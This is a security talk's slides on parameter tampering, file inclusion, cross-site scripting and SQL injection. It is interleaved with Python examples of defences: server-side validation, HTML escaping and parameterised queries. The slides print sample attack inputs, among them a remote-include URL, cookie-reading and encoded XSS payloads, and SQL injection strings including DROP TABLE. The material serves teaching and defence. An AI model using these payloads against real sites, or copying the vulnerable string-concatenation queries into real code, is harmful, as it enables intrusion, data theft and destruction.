Protecting Against Common Web Application Vulnerabilities


Protecting Against Common Web Application Vulnerabilities Alaa Al-Bahrani Regional Cyber Security Leader, GE

Agenda
01 What? What are web applications?
02 How? How web applications work
03 Top Attacks: Top attacks against web applications
04 Vulnerabilities: Common vulnerabilities in web applications
05 Protect: How to protect against web application vulnerabilities
06 Q&A: Questions

Web Applications
- Application hosted on a web server
- Accessed by a web browser
- Connects to a database backend
- Favored by many organizations
- Vulnerable to attacks!

How they work?
[Diagram: Web Browser -> Internet -> Web Server -> Web Application -> Database, with 3rd Party components alongside]

Top Web Application Attacks Source: www.ptsecurity.com

CMS Market Share (Content Management Systems)
- WordPress 60%
- Joomla 6.5%
- Drupal 4.6%
Around 27% of the Internet is powered by WordPress, which means approximately 75 million websites are currently running WordPress as a CMS.
Source: w3techs.com, January 2018; www.whoishostingthis.com

WordPress Vulnerabilities: 2407 vulnerabilities
Source: www.wpwhitesecurity.com

Common Vulnerabilities
- Parameter Tampering
- Command Injection
- Cross-Site Scripting (XSS)
- SQL Injection

Parameter Tampering Attack
Definition: Manipulation of parameters exchanged between client and server in order to modify application data.
URL parameters:
  www.attackbank.com/default.asp?profile=741&debit=1000  ->  www.attackbank.com/default.asp?profile=741&debit=2000
  www.attackbank.com/savepage.asp?id=147&status=read  ->  www.attackbank.com/savepage.asp?id=147&status=delete
Hidden fields:
  <input type="hidden" id="1008" name="cost" value="70.00">

Injection Attacks
Definition: Unsolicited commands and data are passed to the web application because input is not validated.
  www.attackbank.com/index.php?page=members.php  ->  www.attackbank.com/index.php?page=http://badsite.com/attack.php
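The defence against both slides is the same: the server treats every client-supplied parameter as untrusted and re-derives the sensitive values itself. The following Python is an added example written for this transcript, not code from the presentation. The item price, profile number and saved-item id are the slide's values; the catalogue, the page allow-list, the owner table and the per-request debit limit are constructed assumptions standing in for the application's real data.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed server-side state standing in for the application's real data
# (item 1008 at 70.00, profile 741 and saved item 147 are the slide's values;
# the allow-lists and the per-request limit are assumptions).
CATALOGUE = {"1008": 70.00}                             # item id -> authoritative price
PAGES = {"members": "members.php", "news": "news.php"}  # page name -> file to include
SAVEPAGE_STATUSES = {"read", "unread"}                  # statuses this endpoint may set
OWNER_OF_ITEM = {"147": "741"}                          # saved item id -> owning profile
MAX_DEBIT_PER_REQUEST = 1000                            # assumed business limit


class Rejected(Exception):
    """Raised for any request whose parameters fail validation."""


def query_params(url):
    """Parse the query string into single values; a repeated key is rejected
    rather than silently taking the first or last occurrence."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if any(len(values) != 1 for values in params.values()):
        raise Rejected("duplicate parameter")
    return {key: values[0] for key, values in params.items()}


def order_total(form):
    """Hidden-field tampering: the client's 'cost' field is ignored and the
    price is looked up by item id on the server."""
    item_id = form.get("id")
    if item_id not in CATALOGUE:
        raise Rejected("unknown item")
    return CATALOGUE[item_id]


def debit(url, session_profile):
    """URL tampering on profile and debit: the profile must be the one bound
    to the session, and the amount must be an integer within policy."""
    params = query_params(url)
    if params.get("profile") != session_profile:
        raise Rejected("profile does not match the session")
    amount_text = params.get("debit", "")
    if not amount_text.isdigit():
        raise Rejected("debit must be a non-negative integer")
    amount = int(amount_text)
    if amount > MAX_DEBIT_PER_REQUEST:
        raise Rejected("debit exceeds the per-request limit")
    return amount


def savepage(url, session_profile):
    """Tampering with an enumerated parameter: only statuses this endpoint is
    allowed to set are accepted, and the caller must own the item."""
    params = query_params(url)
    item_id = params.get("id")
    if OWNER_OF_ITEM.get(item_id) != session_profile:
        raise Rejected("caller does not own this item")
    status = params.get("status")
    if status not in SAVEPAGE_STATUSES:
        raise Rejected("status not permitted on this endpoint")
    return item_id, status


def include_page(url):
    """File inclusion through 'page': the value selects a key in an
    allow-list and is never treated as a path or URL."""
    name = query_params(url).get("page", "")
    if name not in PAGES:
        raise Rejected("unknown page")
    return PAGES[name]


def rejected(handler, *args):
    """True when the handler refuses the request."""
    try:
        handler(*args)
    except Rejected:
        return True
    return False


if __name__ == "__main__":
    base = "http://www.attackbank.com/"
    print(order_total({"id": "1008", "cost": "0.01"}))                              # 70.0
    print(debit(base + "default.asp?profile=741&debit=1000", "741"))                # 1000
    print(rejected(debit, base + "default.asp?profile=741&debit=2000", "741"))      # True
    print(savepage(base + "savepage.asp?id=147&status=read", "741"))                # ('147', 'read')
    print(rejected(savepage, base + "savepage.asp?id=147&status=delete", "741"))   # True
    print(include_page(base + "index.php?page=members"))                            # members.php
    print(rejected(include_page, base + "index.php?page=http://badsite.com/attack.php"))  # True
```

Note that the `page` parameter is a name, not a file name: mapping names to files on the server side means there is no string the client can send that reaches the filesystem or the network.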


Cross-Site Scripting (XSS)
Definition: Allows attackers to inject client-side scripts into web pages. The scripts are then executed once the client visits the vulnerable web page.
Types: Stored, Reflected
01 The hacker injects the vulnerable website with malicious scripts to steal information from the victim's browser
02 When the victim accesses the vulnerable website, the malicious script executes
03 The malicious script sends the victim's information to the attacker

Cross-Site Scripting (XSS)
XSS using script in attributes:
  <body onload=alert('test1')>
  <b onmouseover=alert('Wufff!')>click me!</b>
  <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
XSS using script via encoded URI schemes:
  <IMG SRC=j&#X41vascript:alert('test2')>
XSS using code encoding:
  <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
  (the base64 payload decodes to <script>alert('test3')</script>)

Cross-Site Scripting (XSS) The same could be used to execute stored XSS attacks in guestbook entries, blog posts, and comments.

Cross-Site Scripting (XSS) Error Page Example
  http://testsite.test/file_which_not_exist
  -> Not found: /file_which_not_exist
  http://testsite.test/<script>alert("TEST");</script>
  -> Not found: / (but with the JavaScript code <script>alert("TEST");</script> echoed into the page)
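The error page above reflects the request path into HTML text without encoding, and the attribute examples on the previous slide rely on unquoted attributes and on URL schemes that were only checked before entity decoding. The Python below is an added example, not code from the presentation, showing the three corresponding defences: context-aware escaping for text and attribute values, quoting every attribute and refusing event-handler attributes altogether, and canonicalising a URL before its scheme is checked against an allow-list. The helper names and the allow-list of schemes are my assumptions.

```python
import html

URL_ATTRIBUTES = {"src", "href"}   # attributes whose value is a URL (assumed list)


def render_not_found(path):
    """Error page body: the requested path is escaped for the HTML text
    context, so '<script>' reaches the browser as literal text."""
    return "<p>Not found: %s</p>" % html.escape(path, quote=True)


def safe_href(url):
    """Allow-list the URL scheme after canonicalising: HTML entities are
    decoded and non-printable characters removed first, so an entity-encoded
    'j&#X41vascript:' is recognised as javascript:. Returns the value escaped
    for a quoted attribute."""
    decoded = html.unescape(url)
    decoded = "".join(ch for ch in decoded if ch.isprintable())
    lowered = decoded.lower()
    allowed = lowered.startswith(("http://", "https://")) or (
        decoded.startswith("/") and not decoded.startswith("//")
    )
    if not allowed:
        raise ValueError("URL scheme not allowed")
    return html.escape(decoded, quote=True)


def href_allowed(url):
    """True when safe_href accepts the URL."""
    try:
        safe_href(url)
    except ValueError:
        return False
    return True


def render_tag(tag, attrs, text=""):
    """Render a non-void tag whose attribute values and text are user data.
    Every attribute is quoted, URL attributes go through safe_href, and
    event-handler attributes (on*) are refused outright."""
    parts = [tag]
    for name, value in attrs.items():
        lname = name.lower()
        if not lname.isalnum():
            raise ValueError("bad attribute name")
        if lname.startswith("on"):
            raise ValueError("event-handler attributes are not allowed")
        rendered = safe_href(value) if lname in URL_ATTRIBUTES else html.escape(value, quote=True)
        parts.append('%s="%s"' % (lname, rendered))
    return "<%s>%s</%s>" % (" ".join(parts), html.escape(text, quote=True), tag)


if __name__ == "__main__":
    print(render_not_found('/<script>alert("TEST");</script>'))
    print(href_allowed("j&#X41vascript:alert('test2')"))            # False
    print(href_allowed("data:text/html;base64,PHNjcmlwdD4="))      # False
    print(render_tag("a", {"href": "https://example.test/?q=<x>"}, "link"))
```

Escaping alone is not enough for the attribute examples: `alert(...)` contains no characters that HTML escaping changes, so an unquoted `onmouseover=` or a `javascript:` URL would survive it. That is why the renderer quotes attributes, rejects `on*` names, and validates URL attributes separately.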

SQL Injection
- The placement of malicious code in SQL statements via web page input
- It is a fault in the code of the web application, not the DBMS
A successful SQL injection exploit can:
- read sensitive data from the database
- modify database data (Insert/Update/Delete)
- execute administration operations on the database (e.g. shut down the DBMS)
- recover the content of a given file present on the DBMS file system
- issue commands to the operating system
Photo source: https://www.link-academy.com/blog/sql-injection-ghidul-celei-mai-utilizate-metode-de-atac

SQL Injection: 1=1 (Tautology) Example
  stringUserID = getRequestString("User_ID");
  stringSQL = "SELECT * FROM Users WHERE User_ID = " + stringUserID;
Resulting query when the input is 110 OR 1=1:
  SELECT * FROM Users WHERE User_ID = 110 OR 1=1;

SQL Injection: Batched SQL Statements Example
  stringUserID = getRequestString("User_ID");
  stringSQL = "SELECT * FROM Users WHERE User_ID = " + stringUserID;
Resulting query when the input is 110; DROP TABLE Suppliers;
  SELECT * FROM Users WHERE User_ID = 110; DROP TABLE Suppliers;

SQL Injection: Search Bar (UNION) Example
  stringTitle = getRequestString("Title");
  stringSQL = "SELECT * FROM Authors WHERE Title Like %" + stringTitle + "%";
Input:
  1 UNION SELECT 1 FROM information_schema.tables --;
Resulting query:
  SELECT * FROM Authors WHERE Title Like 1 UNION SELECT 1 FROM information_schema.tables --%
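All three slides share one root cause: the request string becomes part of the SQL text. The fix is to keep data and query separate with parameterised queries, validating the type first where the column has one. The Python below is an added example, not code from the presentation; it uses the standard library's sqlite3 module and a constructed in-memory database standing in for the Users, Suppliers and Authors tables. It keeps the slides' concatenation pattern as `user_by_id_vulnerable` for contrast and runs the three inputs from the slides against the hardened functions.

```python
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the slides' tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (User_ID INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO Users VALUES (110, 'alice'), (111, 'bob');
        CREATE TABLE Suppliers (Supplier_ID INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO Suppliers VALUES (1, 'acme');
        CREATE TABLE Authors (Author_ID INTEGER PRIMARY KEY, Title TEXT);
        INSERT INTO Authors VALUES (1, 'SQL Basics'), (2, 'Web Security');
    """)
    return conn


def user_by_id_vulnerable(conn, user_id):
    """The slides' pattern: the request string is concatenated into the query,
    so '110 OR 1=1' turns a lookup into a dump of the table."""
    sql = "SELECT * FROM Users WHERE User_ID = " + user_id
    return conn.execute(sql).fetchall()


def user_by_id(conn, user_id):
    """Hardened: validate the type, then bind the value as a parameter so the
    database never parses it as SQL."""
    try:
        uid = int(user_id)  # '110 OR 1=1' and '110; DROP TABLE ...' fail here
    except ValueError:
        raise ValueError("User_ID must be an integer") from None
    return conn.execute("SELECT * FROM Users WHERE User_ID = ?", (uid,)).fetchall()


def rejected(conn, user_id):
    """True when the hardened lookup refuses the value."""
    try:
        user_by_id(conn, user_id)
    except ValueError:
        return True
    return False


def escape_like(term):
    """Escape LIKE metacharacters so user text is matched literally."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_authors(conn, title):
    """Hardened search bar: the pattern is assembled in Python and bound as a
    parameter, so UNION, comment markers and wildcards in the input stay data."""
    pattern = "%" + escape_like(title) + "%"
    return conn.execute(
        "SELECT * FROM Authors WHERE Title LIKE ? ESCAPE '\\'", (pattern,)
    ).fetchall()


def table_exists(conn, name):
    """True when a table of that name is still present."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = build_db()
    print(user_by_id_vulnerable(db, "110 OR 1=1"))        # both users
    print(user_by_id(db, "110"))                          # [(110, 'alice')]
    print(rejected(db, "110 OR 1=1"))                     # True
    print(rejected(db, "110; DROP TABLE Suppliers;"))     # True
    print(table_exists(db, "Suppliers"))                  # True
    print(search_authors(db, "SQL"))                      # [(1, 'SQL Basics')]
    print(search_authors(db, "1 UNION SELECT 1 FROM information_schema.tables --"))  # []
```

The `ESCAPE` clause is the detail most examples leave out: without it a search term of `%` matches every row, which is a data-exposure problem even when the query itself can no longer be altered.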

SQL Injection
- Many tools automate SQL injection attacks
- Any input field can be used: login form, search bar, newsletter registration, etc.

How To Protect

Defense in Depth
- Layer 7: Web Application
- Layer 6: 3rd Party Components
- Layer 5: Database
- Web Server
- Operating System
- Network
- Physical Security

Protecting Your Web Application
- Input Validation
- Code Testing

Web Application Firewall (WAF)
[Diagram: the earlier architecture (Web Browser, Internet, Web Server, Database, 3rd Party) with a WAF added in front of the web server]

Honeypots
- Honeypots are a security system to detect and divert attacks
- They replicate system services such as web services
- They allow collecting more information about the attack
Photo source: https://www.carnaghan.com/honeypots-to-lure-or-not-to-lure/

Thank You